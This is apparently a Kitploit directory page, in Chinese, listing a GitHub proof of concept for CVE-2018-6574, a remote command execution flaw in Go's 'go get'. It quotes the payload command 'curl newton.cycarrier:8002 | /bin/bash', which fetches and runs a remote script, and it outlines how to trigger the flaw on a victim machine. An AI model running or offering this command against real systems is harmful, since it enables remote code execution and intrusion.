Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-6574 | Kitploit
工具/GitHubGitHub/frozenkp/cve-2018-6574
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubfrozenkp/cve-2018-6574

CVE-2018-6574

查看仓库
214年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-6574

Go 1.8.7 之前的版本、Go 1.9.x 在 1.9.4 之前,以及 Go 1.10 预发布版本在 Go 1.10rc2 之前,允许在源代码构建期间通过 go get 远程执行命令,利用 gcc 或 clang 插件功能,因为 -fplugin= 和 -plugin= 参数未被阻止。(来自 mitre)

RCE 命令

该命令被编译进动态库 calc_darwin.so。当前命令为 curl newton.cycarrier:8002 | /bin/bash。它曾被用作程序的初始访问。你需要在 8002 端口托管一个文件服务器,并将主机绑定到你的 IP。

如何触发?

首先,你需要在受害者机器上安装所需版本的 golang。然后,将此仓库托管在一个可访问的 git 服务器上。最后,使用 go get 命令获取该仓库,命令将自动执行。

以我的仓库为例。你需要使用以下命令:

root@kitploit:~
go get github.com/frozenkp/CVE-2018-6574

警告

此仓库仅供评估目的使用。

下载工具